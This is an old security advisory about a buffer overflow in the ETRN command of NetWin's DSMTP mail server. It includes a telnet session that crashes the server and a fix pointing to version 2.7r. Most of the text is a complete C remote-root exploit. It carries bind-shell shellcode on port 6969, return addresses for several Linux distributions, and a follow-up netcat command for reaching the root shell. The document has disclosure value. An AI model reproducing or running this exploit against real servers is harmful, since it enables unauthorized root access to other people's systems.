COMMAND
dsmtp
SYSTEMS AFFECTED
DMailWeb
PROBLEM
Eric Andry found following. He's been sitting on this for a
while, but dsmtp (part of the dmail package by NetWin) has a
buffer overflow in the ETRN command, causing the server to crash
and dump core.
NotNow>telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 myhost.mydomain DSMTP ESMTP Server v2.8g
EHLO ""
250-myhost.mydomain. Hello "" (127.0.0.1)
250-ETRN
250-DSN
250 HELP
ETRN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.
NotNow>
NotNow>cd /usr/local/dmail
NotNow>ls -la core
-rw------- 1 root root 1961984 Jun 1 13:42 core
NotNow>
A little over 260 A's would cauase the crash. Tested on V. 2.8d,
e, f, and g. All are Beta Releases, never tested on "stable"
versions. Here's the exploit:
/*
Netwin DSMTP Server v2.7q remote-root exploit
noir@gsu.linux.org.tr | noir@olympos.org
tested arch = x86/Linux mdk7.0
I will port this to Solaris & FreeBSD when I have time...
check http://gsu.linux.org.tr/~noir/ offsets for other Linux distros.
greetz: moog, si_ (happy birthday!), CronoS, still, teso crew,
gsu-linux, `B, calaz, olympos secteam
FOUND BY Eric Andry eric@wincom.net
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
unsigned char shellcode[]= /* noir@olympos.org */
"\x31\xc0\x40\x40\x89\x45\xf4\x48\x89\x45\xf8\x48\x89"
"\x45\xfc\xb0\x66\x31\xdb\x43\x8d\x4d\xf4\xcd\x80\x31"
"\xdb\x43\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1b\x39"
"\x31\xdb\x89\x5d\xf0\x89\x45\xf4\x89\xc2\x8d\x45\xec"
"\x89\x45\xf8\xc6\x45\xfc\x10\x31\xc0\xb0\x66\x31\xdb"
"\xb3\x02\x8d\x4d\xf4\xcd\x80\x89\x55\xf8\x31\xc0\x40"
"\x89\x45\xfc\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x8d\x4d"
"\xf8\xcd\x80\x89\x55\xf4\x31\xc0\x89\x45\xf8\x89\x45"
"\xf8\x89\x45\xfc\xb0\x66\x31\xdb\xb3\x05\x8d\x4d\xf4"
"\xcd\x80\x89\xc2\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xcd"
"\x80\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xb1\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\x31\xc9\xb1\x02\xcd\x80"
/* generic shellcode execve(args[0],args,0); aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int resolv(char *hname, struct in_addr *addr);
#define RET_MDK70 0xbfff97ec
#define RET_REDHAT60 0xaabbccdd
#define RET_SLACK70 0xddccbbaa
#define NOP 0x90
#define ALIGN 1
int
main(int argc, char *argv[])
{
int fd, n;
int i, l;
unsigned char ovf[860];
char buff[200];
int offset = 0;
struct sockaddr_in servaddr;
if (argc < 2 ){
fprintf(stderr,"%s <host> [offset]\n",argv[0]);
exit(0);
}
if(argv[2])
offset=atoi(argv[2]);
printf("Netwin DSMTP v2.7q remote-root exploit by noir\n");
if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
perror("socket");
exit(-1);
}
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(25);
if(!resolv(argv[1], &servaddr.sin_addr)){
herror("gethostbyname");
exit(-1); }
if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
perror("connect");
exit(-1);
}
n = read(fd, buff, 1024);
write(STDOUT_FILENO, buff, n);
sleep(2);
fprintf(stderr, "check for portshell 6969/tcp when done\n");
memset(ovf, NOP, sizeof(ovf));
for( i = ALIGN; i < 300; i+=4)
*(long *) &ovf[i] = RET_MDK70 + offset;
for( i = 650, l = 0; l < strlen(shellcode) ;i++, l++)
ovf[i] = shellcode[l];
memcpy(ovf, "ETRN ", 5);
strcpy(ovf+858,"\r\n\0");
write(fd, ovf, strlen(ovf));
fprintf(stderr,"done!\n$ nc %s 6969\n", argv[1]);
return 1;
}
int
resolv(char *hname, struct in_addr *addr)
{
struct hostent *hp;
if ( (hp = gethostbyname(hname)) == NULL)
return 0;
memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
return 1;
}
SOLUTION
Netwinsite released a new version of Dmail - 2.7r which fixes
this exploit. It is available at
ftp://ftp.netwinsite.com/pub/dmail/
Currently, there are only Linux and Solaris versions available.